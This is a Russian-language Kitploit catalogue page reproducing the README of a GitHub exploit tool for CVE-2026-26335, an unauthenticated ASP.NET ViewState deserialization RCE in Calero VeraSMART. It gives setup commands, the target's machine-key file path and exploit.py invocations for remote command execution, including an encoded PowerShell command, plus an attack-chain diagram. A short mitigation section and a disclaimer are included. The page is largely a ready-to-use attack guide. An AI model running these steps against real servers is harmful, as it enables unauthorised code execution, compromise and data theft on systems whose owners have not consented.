Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-26335-Calero-VeraSMART-RCE — Автоматический эксплойт для CVE-2026-26335 — критической неаутентифицированной RCE-уязвимости в Calero VeraSMART через поддельный ASP.NET ViewState с использованием статических ключей машины. Включает обнаружение конечных точек, генерацию полезной нагрузки и выполнение команд. | Kitploit
Инструменты/GitHubGitHub/mbanyamer/cve-2026-26335-calero-verasmart-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеRed Teaming
GitHubmbanyamer/cve-2026-26335-calero-verasmart-rce

CVE-2026-26335-Calero-VeraSMART-RCE

Автоматический эксплойт для CVE-2026-26335 — критической неаутентифицированной RCE-уязвимости в Calero VeraSMART через поддельный ASP.NET ViewState с использованием статических ключей машины. Включает обнаружение конечных точек, генерацию полезной нагрузки и выполнение команд.

Репозиторий
16 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

👤 Автор

Mohammed Idrees Banyamer Исследователь в области безопасности

  • GitHub: https://github.com/mbanyamer
  • Instagram: https://instagram.com/banyamer_security

CVE-2026-26335 - Calero VeraSMART ViewState RCE Exploit

CVE Severity CVSS Platform ASP.NET Python License Author


📌 Описание

CVE‑2026‑26335 — критическая уязвимость удалённого выполнения кода без аутентификации в Calero VeraSMART (до версии 2022 R1).

Приложение использует статически заданные ASP.NET machine keys, одинаковые для всех установок.
Злоумышленник, обладающий этими ключами, может подделать вредоносный ASP.NET ViewState и вызвать десериализацию на стороне сервера → RCE.

Эксплойт автоматизирует:

  • Обнаружение ViewState-эндпоинта
  • Извлечение __VIEWSTATEGENERATOR
  • Генерацию полезной нагрузки ysoserial
  • Доставку подписанного ViewState
  • Выполнение команд

⚠️ Воздействие

  • RCE без аутентификации
  • Компрометация учётной записи IIS
  • Горизонтальное перемещение по домену
  • Экфильтрация данных
  • Постоянство через веб-шелл

🧠 Первопричина

CWE‑321 — Жёстко заданные криптографические ключи

Развёртывания VeraSMART используют одинаковый ASP.NET machineKey:

root@kitploit:~
<machineKey validationKey="STATIC_KEY"
           decryptionKey="STATIC_KEY"
           validation="SHA1"
           decryption="AES" />

Любой злоумышленник, получивший ключи от одной установки, может атаковать все остальные.


🛠 Требования

  • Python 3
  • ysoserial.net
  • Ключи machineKey VeraSMART
  • Сетевой доступ к IIS

⚙️ Установка

root@kitploit:~
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe

🔑 Получение machine keys

Ключи не являются публичными. Получите их с целевой системы:

root@kitploit:~
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config

Или через сопутствующее чтение файлов:

CVE‑2026‑26333


🚀 Использование

Проверка уязвимости

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v

Выполнение команды

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"

Конкретный эндпоинт

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="

Отладка через прокси

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v

📡 Схема эксплуатации

  1. Найти ViewState-эндпоинт
  2. Извлечь генератор
  3. Сгенерировать подписанную полезную нагрузку
  4. Отправить поддельный ViewState
  5. Десериализация ASP.NET
  6. Выполнение команд

📊 CVSS

9.8 — Критический AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


🧪 Протестировано на

  • VeraSMART 2020
  • VeraSMART 2021
  • VeraSMART 2022 (до R1)
  • Windows Server 2016/2019
  • IIS 10
  • ASP.NET 4.x

🔒 Меры по устранению

Исправлено в VeraSMART 2022 R1:

  • Уникальные machine keys
  • Усиление защиты ViewState
  • Безопасное хранение ключей

Обходные меры:

  • Ротация machineKey
  • Отключение ViewState
  • Ограничение доступа к IIS
  • Правила WAF для ViewState

📚 Ссылки

  • https://www.vulncheck.com/advisories/calero-verasmart-2022-r1-static-iis-machine-keys-enable-viewstate-rce
  • https://www.calero.com/

⚖️ Отказ от ответственности

Только для образовательных целей и авторизованного тестирования. Используйте только на системах, которыми вы владеете или на тестирование которых у вас есть разрешение.


👤 Автор

Mohammed Idrees Banyamer Исследователь в области безопасности

  • GitHub: https://github.com/mbanyamer
  • Instagram: https://instagram.com/banyamer_security

📊 Схема эксплойта

На следующей диаграмме показана цепочка эксплуатации CVE‑2026‑26335 в Calero VeraSMART, где статические ASP.NET machine keys позволяют подделать вредоносный ViewState, что приводит к удалённому выполнению кода.

root@kitploit:~
flowchart LR
    A[Attacker] --> B[Obtain VeraSMART machineKey]
    B --> C[Discover ViewState endpoint]
    C --> D[Extract __VIEWSTATEGENERATOR]
    D --> E[Generate malicious ViewState via ysoserial]
    E --> F[Sign payload with machineKey]
    F --> G[Send forged POST request]
    G --> H[ASP.NET ViewState deserialization]
    H --> I[TypeConfuseDelegate gadget]
    I --> J[Remote Code Execution on IIS]
Скачать инструмент